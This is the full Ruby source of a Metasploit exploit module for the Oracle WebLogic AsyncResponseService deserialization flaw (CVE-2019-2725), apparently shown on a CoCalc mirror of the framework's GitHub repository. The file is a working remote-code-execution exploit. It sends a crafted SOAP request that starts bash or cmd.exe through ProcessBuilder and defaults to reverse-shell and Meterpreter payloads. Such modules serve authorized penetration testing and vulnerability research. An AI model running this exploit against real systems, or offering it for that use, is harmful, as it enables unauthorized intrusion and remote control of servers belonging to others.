CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
Views: 11623
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::Powershell

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',

17
        'Description' => %q{

18
          An unauthenticated attacker with network access to the Oracle Weblogic Server T3

19
          interface can send a malicious SOAP request to the interface WLS AsyncResponseService

20
          to execute code on the vulnerable host.

21
        },

22
        'Author' => [

23
          'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          ['CVE', '2019-2725'],

28
          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],

29
          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],

30
          ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']

31
        ],

32
        'Privileged' => false,

33
        'Platform' => %w[unix win solaris],

34
        'Targets' => [

35
          [

36
            'Unix',

37
            {

38
              'Platform' => 'unix',

39
              'Arch' => ARCH_CMD,

40
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }

41
            }

42
          ],

43
          [

44
            'Windows',

45
            {

46
              'Platform' => 'win',

47
              'Arch' => [ARCH_X64, ARCH_X86],

48
              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }

49
            }

50
          ],

51
          [

52
            'Solaris',

53
            {

54
              'Platform' => 'solaris',

55
              'Arch' => ARCH_CMD,

56
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },

57
              'Payload' => {

58
                'Space' => 2048,

59
                'DisableNops' => true,

60
                'Compat' =>

61
                {

62
                  'PayloadType' => 'cmd',

63
                  'RequiredCmd' => 'generic perl telnet'

64
                }

65
              }

66
            }

67
          ]

68
        ],

69
        'DefaultTarget' => 0,

70
        'DefaultOptions' => {

71
          'WfsDelay' => 12

72
        },

73
        'DisclosureDate' => '2019-04-23',

74
        'Notes' => {

75
          'Stability' => [ CRASH_SAFE ],

76
          'SideEffects' => [ IOC_IN_LOGS ],

77
          'Reliability' => [ REPEATABLE_SESSION ]

78
        }

79
      )

80
    )

81


82
    register_options(

83
      [

84
        Opt::RPORT(7001),

85
        OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])

86
      ]

87
    )

88
  end

89


90
  def check

91
    res = send_request_cgi(

92
      'uri' => normalize_uri(target_uri.path),

93
      'method' => 'POST',

94
      'ctype' => 'text/xml',

95
      'headers' => { 'SOAPAction' => '' }

96
    )

97


98
    if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')

99
      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")

100
      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")

101
      Exploit::CheckCode::Vulnerable

102
    elsif res && res.code != 202

103
      vprint_status('The target returned a non-vulnerable HTTP code')

104
      Exploit::CheckCode::Safe

105
    elsif res.nil?

106
      vprint_status('The target did not respond in an expected way')

107
      Exploit::CheckCode::Unknown

108
    else

109
      vprint_status("The target returned HTTP code: #{res.code}")

110
      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")

111
      Exploit::CheckCode::Unknown

112
    end

113
  end

114


115
  def exploit

116
    print_status('Generating payload...')

117
    case target.name

118
    when 'Windows'

119
      string0_cmd = 'cmd.exe'

120
      string1_param = '/c'

121
      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })

122
    when 'Unix', 'Solaris'

123
      string0_cmd = '/bin/bash'

124
      string1_param = '-c'

125
      shell_payload = payload.encoded

126
    end

127


128
    random_action = rand_text_alphanumeric(20)

129
    random_relates = rand_text_alphanumeric(20)

130


131
    soap_payload = %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/")

132
    soap_payload << %(xmlns:wsa="http://www.w3.org/2005/08/addressing")

133
    soap_payload << %(xmlns:asy="http://www.bea.com/async/AsyncResponseService">)

134
    soap_payload << %(<soapenv:Header>)

135
    soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)

136
    soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)

137
    soap_payload << %(<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">)

138
    soap_payload << %(<void class="java.lang.ProcessBuilder">)

139
    soap_payload << %(<array class="java.lang.String" length="3">)

140
    soap_payload << %(<void index="0">)

141
    soap_payload << %(<string>#{string0_cmd}</string>)

142
    soap_payload << %(</void>)

143
    soap_payload << %(<void index="1">)

144
    soap_payload << %(<string>#{string1_param}</string>)

145
    soap_payload << %(</void>)

146
    soap_payload << %(<void index="2">)

147
    soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)

148
    # soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|

149
    soap_payload << %(</void>)

150
    soap_payload << %(</array>)

151
    soap_payload << %(<void method="start"/>)

152
    soap_payload << %(</void>)

153
    soap_payload << %(</work:WorkContext>)

154
    soap_payload << %(</soapenv:Header>)

155
    soap_payload << %(<soapenv:Body>)

156
    soap_payload << %(<asy:onAsyncDelivery/>)

157
    soap_payload << %(</soapenv:Body>)

158
    soap_payload << %(</soapenv:Envelope>)

159


160
    print_status('Sending payload...')

161


162
    begin

163
      res = send_request_cgi(

164
        'uri' => normalize_uri(target_uri.path),

165
        'method' => 'POST',

166
        'ctype' => 'text/xml',

167
        'data' => soap_payload,

168
        'headers' => { 'SOAPAction' => '' }

169
      )

170
    rescue Errno::ENOTCONN

171
      fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')

172
    end

173


174
    if res.nil?

175
      fail_with(Failure::Unreachable, 'No response from host')

176
    elsif res && res.code != 202

177
      fail_with(Failure::UnexpectedReply, "Exploit failed.  Host responded with HTTP code #{res.code} instead of HTTP code 202")

178
    end

179
  end

180
end

181


182